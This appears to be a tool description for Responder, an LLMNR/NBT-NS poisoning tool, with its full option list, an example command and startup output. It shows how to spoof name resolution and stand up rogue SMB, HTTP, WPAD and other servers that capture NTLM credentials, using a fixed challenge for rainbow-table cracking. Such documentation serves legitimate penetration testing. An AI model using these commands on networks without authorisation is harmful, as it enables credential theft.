Responder is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix.
responder -i 10.20.30.40 -b 1 -s On -r 0
-h, --help show this help message and exit -i 10.20.30.40, --ip=10.20.30.40 The ip address to redirect the traffic to. (usually yours) -b 0, --basic=0 Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.This option is mandatory. -s Off, --http=Off Set this to On or Off to start/stop the HTTP server. Default value is On -S Off, --smb=Off Set this to On or Off to start/stop the SMB server. Default value is On -q Off, --sql=Off Set this to On or Off to start/stop the SQL server. Default value is On -r 0, --wredir=0 Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0) -c 1122334455667788, --challenge=1122334455667788 The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables -l Responder-Session.log, --logfile=Responder-Session.log Log file to use for Responder session. -f Off, --fingerprint=Off This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query. -F On, --ftp=On Set this to On or Off to start/stop the FTP server. Default value is On -L On, --ldap=On Set this to On or Off to start/stop the LDAP server. Default value is On -D On, --dns=On Set this to On or Off to start/stop the DNS server. Default value is On -w On, --wpad=On Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is On
cyborg@cyborg:~$ sudo responder -i 192.168.1.6 -w On -r 0 -f On NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to: [email protected] To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started Global Parameters set Challenge set is: 1122334455667788 WPAD Proxy Server is:ON HTTP Server is:ON SMB Server is:ON SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:ON